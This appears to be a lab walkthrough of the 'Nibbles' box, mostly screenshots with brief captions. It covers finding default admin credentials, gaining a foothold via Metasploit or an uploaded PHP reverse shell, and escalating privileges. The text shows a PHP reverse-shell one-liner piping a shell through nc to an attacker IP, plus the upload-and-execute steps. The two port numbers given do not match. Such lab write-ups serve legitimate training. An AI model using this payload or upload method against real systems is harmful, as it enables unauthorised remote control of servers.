Nibbles - HackMD

# Enumeration ![image](https://hackmd.io/_uploads/SkU1iP8Op.png) # Web Footprinting ![image](https://hackmd.io/_uploads/rkksItLup.png) ![image](https://hackmd.io/_uploads/S1ZcZcUua.png) ![image](https://hackmd.io/_uploads/BytlbKUOp.png) ![image](https://hackmd.io/_uploads/r1vSlF8d6.png) ![image](https://hackmd.io/_uploads/Hk8uftUOT.png) ![image](https://hackmd.io/_uploads/H1zmXtL_p.png) => username : admin password : nibbles ![image](https://hackmd.io/_uploads/rkhkG5Lda.png) ![image](https://hackmd.io/_uploads/S1EvB_8uT.png) # Initial Foothold ### 1. Use Metasploit ![image](https://hackmd.io/_uploads/SJi4PY8Op.png) ![image](https://hackmd.io/_uploads/HJpvyqU_6.png) ![image](https://hackmd.io/_uploads/rkmCycL_6.png) ![image](https://hackmd.io/_uploads/ByCsuKLOT.png) - local host => ifconfig => tun0(VPN IP) ![image](https://hackmd.io/_uploads/rk6A5tIup.png) ![image](https://hackmd.io/_uploads/HyKzhFIOT.png) - shell => Create shell - `python3 -c 'import pty; pty.spawn("/bin/bash")'` => Spawn a pseudo-terminal ![image](https://hackmd.io/_uploads/rk-P6F8da.png) ### 2. Use Reverse Shell ![image](https://hackmd.io/_uploads/BkOBQ98OT.png) ![image](https://hackmd.io/_uploads/rJjcTq8u6.png) - Bash reverse shell one-liner (PHP script) - `<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.18 8433 >/tmp/f"); ?>` - 10.10.16.18 => AttackING IP - 8843 => Listening port ![image](https://hackmd.io/_uploads/rJyf49Uda.png) - Start a netcat listener ![image](https://hackmd.io/_uploads/Sk-Ar9Uua.png) => username : admin password : nibbles ![image](https://hackmd.io/_uploads/S1aew9I_6.png) - Plugins => My images => Configure ![image](https://hackmd.io/_uploads/BJUnFc8u6.png) - Choose File => image.php => Save changes ![image](https://hackmd.io/_uploads/BJC_O9Ldp.png) - Check whether image.php is uploaded successful ![image](https://hackmd.io/_uploads/SydViq8dp.png) - Execute the reverse shell ![image](https://hackmd.io/_uploads/Bka8icLu6.png) - Check the netcat listener ![image](https://hackmd.io/_uploads/S1Vr3cUd6.png) - `python3 -c 'import pty; pty.spawn("/bin/bash")'` => Spawn a pseudo-terminal ![image](https://hackmd.io/_uploads/BkPG6qIOT.png) # Privilege Escalation ### 1. Use Metasploit ![image](https://hackmd.io/_uploads/B1XJGbPdp.png) ![image](https://hackmd.io/_uploads/HykEG-DuT.png) ![image](https://hackmd.io/_uploads/Hk82gbPO6.png) ![image](https://hackmd.io/_uploads/rk7HbZv_p.png) ![image](https://hackmd.io/_uploads/H1X77ZvOT.png) ![image](https://hackmd.io/_uploads/ryZsQ-P_6.png) ### 2. Use Reverse Shell ![image](https://hackmd.io/_uploads/B1tXKZPOa.png) ![image](https://hackmd.io/_uploads/SJJEiZv_p.png) ![image](https://hackmd.io/_uploads/rJMtj-POa.png) ![image](https://hackmd.io/_uploads/S1L5hWvOT.png) ![image](https://hackmd.io/_uploads/BJTah-vuT.png) ![image](https://hackmd.io/_uploads/SymVp-vd6.png) ![image](https://hackmd.io/_uploads/HJ59TZP_p.png) ![image](https://hackmd.io/_uploads/r10OAbwua.png)